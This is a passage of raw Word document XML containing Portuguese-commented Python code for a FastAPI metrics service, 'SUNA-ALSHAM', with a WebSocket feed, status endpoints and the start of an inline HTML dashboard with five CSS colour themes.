    <w:p w14:paraId="20487AB0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="179766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Aplicação FastAPI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263723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app = FastAPI(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6892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title="SUNA-ALSHAM Sistema Auto-Evolutivo - PERFECT 10/10 + 5 Temas",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B628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description="Sistema Unificado Neural Avançado com WebSocket, Event Log, 5 Temas e todas as melhorias",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614429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version="3.0.0"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F094D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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E39124" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F43F6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CORS para desenvolvimento</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4DF6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app.add_middleware(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB85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CORSMiddleware,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207DCF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allow_origins=["*"],  # Em produção, especificar domínios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158107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allow_credentials=True,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12000B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allow_methods=["*"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BE55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allow_headers=["*"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EED6D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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2597B936" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A926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@app.on_event("startup")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3528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async def startup_event():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E531F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"""Inicialização do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F563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await orchestrator.initialize()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0205C739" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32B87B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# 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WEBSOCKET ENDPOINT - TEMPO REAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5FD9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@app.websocket("/ws")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2E87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async def websocket_endpoint(websocket: WebSocket):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FE24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"""Endpoint WebSocket para atualizações em tempo real"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C390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await event_system.connect(websocket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26870D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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2629DB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Enviar métricas iniciais</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECFD5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initial_data = orchestrator.get_system_metrics()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7631C0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await websocket.send_json({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB459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'type': 'initial_data',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE8EE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'data': initial_data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150D80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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F6BF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2205B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Loop para manter conexão ativa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E61E8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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1221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Enviar métricas atualizadas a cada 2 segundos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA21F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asyncio.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A5C3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current_data = orchestrator.get_system_metrics()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4351AF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await websocket.send_json({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC2C2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'type': 'metrics_update',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA04E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'data': current_data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F644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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B812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BA3EA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except WebSocketDisconnect:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5B62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event_system.disconnect(websocket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE4F4F0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10958B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# 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API ENDPOINTS TRADICIONAIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541898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@app.get("/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E971B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async def root():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160549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"""Endpoint principal"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EBE4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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA91B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"message": "SUNA-ALSHAM Sistema Ativo - PERFECT 10/10 + 5 Temas",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518A14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"version": "3.0.0",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393E41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"status": "operational",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247636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"accelerated_mode": ACCELERATED_MODE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661DDF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"total_cycles": cycle_counter.total_cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232636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"uptime": cycle_counter.get_uptime(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C175D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"agents": ["CoreAgent", "GuardAgent", "LearnAgent"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E95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"value": "R$ 1.430.000",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6867E8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"features": ["WebSocket", "Event Log", "Drill-Down", "Stacked Charts", "5 Temas", "Modais"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754564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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022A4B2B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B9272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@app.get("/api/metrics")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3ECB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async def get_metrics():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00221B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"""Retorna métricas completas do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378657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return orchestrator.get_system_metrics()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D09964" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="589966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@app.get("/api/agent/{agent_name}/details")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100A69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async def get_agent_details(agent_name: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8972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"""Endpoint para drill-down de agentes específicos"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060CBF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return orchestrator.get_detailed_agent_metrics(agent_name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32224E8D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="692C56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@app.get("/api/events")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6511BA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async def get_events(limit: int = 20):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7423AF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"""Retorna eventos recentes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="181C10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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C262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'events': event_system.get_recent_events(limit),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475C46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'total_events': len(event_system.event_log)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A01A8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB970D8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="212B00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@app.get("/api/cycles")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CDC6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async def get_cycle_stats():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3632D1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"""Retorna estatísticas detalhadas dos ciclos"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ABA9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return cycle_counter.get_stats()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1294016E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53079A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@app.get("/api/cycles/history")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CB5D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async def get_cycle_history():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CFEB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"""Retorna histórico dos últimos ciclos"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5496A0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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A08C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'total_cycles': cycle_counter.total_cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774D66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'history': cycle_counter.cycle_history[-50:],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6ADC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'stats': cycle_counter.get_stats()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A6F3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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE7CFFE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54230C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@app.get("/health")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA28F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async def health_check():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A77FD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"""Health check do sistema"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6854E8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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5AFA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"status": "healthy",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694CEF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"timestamp": datetime.now().isoformat(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4787A1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"total_cycles": cycle_counter.total_cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394E2F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"uptime": cycle_counter.get_uptime(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0777F3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"accelerated_mode": ACCELERATED_MODE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBCF8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"websocket_connections": len(event_system.connections)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8713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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0AB4F4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71CCDE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@app.get("/agent/status")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6FFB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async def agent_status():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721163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"""Status individual dos agentes"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2028CF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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BE15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"core_agent": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3CB4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"id": orchestrator.core_agent.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26EE30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"cycles": orchestrator.core_agent.cycle_count,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC535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"performance": orchestrator.core_agent.current_performance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB439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"running": orchestrator.core_agent.running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F106A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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C540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"learn_agent": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413AAD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"id": orchestrator.learn_agent.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031CDE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"cycles": orchestrator.learn_agent.training_cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059990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"performance": orchestrator.learn_agent.performance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F48DC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"running": orchestrator.learn_agent.running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593100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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F471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"guard_agent": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BF78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"id": orchestrator.guard_agent.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57743B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"checks": orchestrator.guard_agent.checks_performed,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21152C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"status": orchestrator.guard_agent.status,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444BD3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"running": orchestrator.guard_agent.running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF1144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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA2D0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"total_cycles": cycle_counter.total_cycles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331A96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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E01735B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38B326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# </w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎨</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> DASHBOARD HTML INTEGRADO - VERSÃO CORRIGIDA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD6F3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@app.get("/dashboard", response_class=HTMLResponse)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10371B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async def dashboard():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D241F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"""Dashboard web integrado - VERSÃO CORRIGIDA COM CONTADOR FUNCIONANDO"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD5A7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688602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dashboard_html = """&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78228D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&lt;html lang="pt-BR"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608842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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666BC1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charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEF05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&lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A03C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&lt;title&gt;ALSHAM GLOBAL COMMERCE - ARQUÉTIPO SUPREMO DASHBOARD&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184390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2FC59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CDN Libraries --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561234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&lt;link href="https://cdn.jsdelivr.net/npm/tailwindcss@2.2.19/dist/tailwind.min.css" rel="stylesheet"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13706D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&lt;link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@6.4.0/css/all.min.css"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2359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&lt;link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@400;700;900&amp;family=Inter:wght@300;400;500;600;700&amp;display=swap" rel="stylesheet"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7635E7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D02A6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&lt;script src="https://cdn.jsdelivr.net/npm/chart.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C61E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&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.12.2/gsap.min.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009E42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&lt;script src="https://cdn.jsdelivr.net/npm/three@0.158.0/build/three.min.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526E88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&lt;script src="https://cdn.jsdelivr.net/npm/countup.js@2.6.2/dist/countUp.umd.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756F06AC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F5FFB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&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6051A9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:root {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CFBA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/* Arquétipo Mago Visionário - Paleta Psicológica */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3730E6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--roxo-arcano: #6C3483;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0F7D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--azul-galactico: #1F618D;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4215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--dourado-etereo: #F4D03F;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554DBC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--cinza-carbono: #2C3E50;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224215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--verde-esmeralda: #2ECC71;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C40F9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--branco-prismatico: #FDFEFE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A69C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--abismo-estrategico: #020C1B;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF11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7CCFF4D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6B0A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LUXURY GLASS THEME (DEFAULT) === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8F44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.theme-luxury-glass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123536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--bg-primary: linear-gradient(135deg, #1a1a2e 0%, #16213e 50%, #0f3460 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6C18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--bg-card: rgba(255, 255, 255, 0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3400D3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--bg-secondary: rgba(0, 245, 255, 0.05);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECA63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--text-primary: #ffffff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5554FB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--text-secondary: #b0c4de;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383013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--accent-primary: var(--dourado-etereo);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275EEC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--accent-secondary: var(--verde-esmeralda);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9516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--accent-tertiary: var(--roxo-arcano);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1588A5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--border-glow: rgba(244, 208, 63, 0.3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364177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--shadow-glow: 0 0 30px rgba(244, 208, 63, 0.2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A02F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--particles-color: #F4D03F;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0454CA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3DAB3EB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="383522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QUANTUM VOID THEME === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696A10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.theme-quantum-void {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FD06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--bg-primary: linear-gradient(135deg, var(--abismo-estrategico) 0%, #1a0033 50%, #330066 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC3F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--bg-card: rgba(108, 52, 131, 0.2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D19D9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--bg-secondary: rgba(156, 39, 176, 0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B986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--text-primary: #e1bee7;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6F5A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--text-secondary: #ce93d8;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDEBD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--accent-primary: #9c27b0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7515DF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--accent-secondary: #e91e63;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632B46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--accent-tertiary: #673ab7;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E310E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--border-glow: rgba(156, 39, 176, 0.4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0768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--shadow-glow: 0 0 40px rgba(156, 39, 176, 0.3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364E26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--particles-color: #9c27b0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3425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E9EB9B4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A46FD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NEURAL TWILIGHT THEME === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4075A3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.theme-neural-twilight {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1701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--bg-primary: linear-gradient(135deg, #0d1421 0%, #1a252f 50%, #2c3e50 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B25F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--bg-card: rgba(52, 152, 219, 0.15);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B089E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--bg-secondary: rgba(41, 128, 185, 0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BE45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--text-primary: #ecf0f1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526DAF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--text-secondary: #bdc3c7;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55028A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--accent-primary: #3498db;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D774A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--accent-secondary: #2980b9;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446EFD6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--accent-tertiary: #1abc9c;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FD49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--border-glow: rgba(52, 152, 219, 0.4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40087D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--shadow-glow: 0 0 35px rgba(52, 152, 219, 0.25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B06C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--particles-color: #3498db;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4ABB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D026574" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FFAF3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CYBER AURORA THEME === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29567F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.theme-cyber-aurora {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767415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--bg-primary: linear-gradient(135deg, #0a0a0a 0%, #1a1a2e 50%, #16213e 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6F95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--bg-card: rgba(0, 255, 127, 0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D047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--bg-secondary: rgba(0, 245, 255, 0.05);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4642C4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--text-primary: #00ff7f;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7153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--text-secondary: #7fffd4;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A7CD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--accent-primary: #00ff7f;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1889BA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--accent-secondary: #00f5ff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C33A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--accent-tertiary: #ff1493;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAA0C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--border-glow: rgba(0, 255, 127, 0.4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ACF1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--shadow-glow: 0 0 40px rgba(0, 255, 127, 0.3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBD2F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--particles-color: #00ff7f;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC7E5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8AFFE02" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B08C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TRANSCENDENTAL LIGHT THEME === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1B90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.theme-transcendental-light {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8288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--bg-primary: linear-gradient(135deg, #fdfefe 0%, #f8f9fa 50%, #e9ecef 100%);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BAFA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--bg-card: rgba(108, 52, 131, 0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3016B7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--bg-secondary: rgba(244, 208, 63, 0.05);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7289DA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--text-primary: var(--cinza-carbono);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9CB5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--text-secondary: #6c757d;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDDA3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--accent-primary: var(--roxo-arcano);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C90C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--accent-secondary: var(--azul-galactico);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE3E6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--accent-tertiary: var(--dourado-etereo);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7517F8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--border-glow: rgba(108, 52, 131, 0.3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339847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--shadow-glow: 0 0 25px rgba(108, 52, 131, 0.2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7404E7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--particles-color: #6C3483;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3096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217DBC6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385705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BASE STYLES === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D85B5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* {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8192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margin: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDAE2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0;</w:t>
      </w:r>
    </w:p>
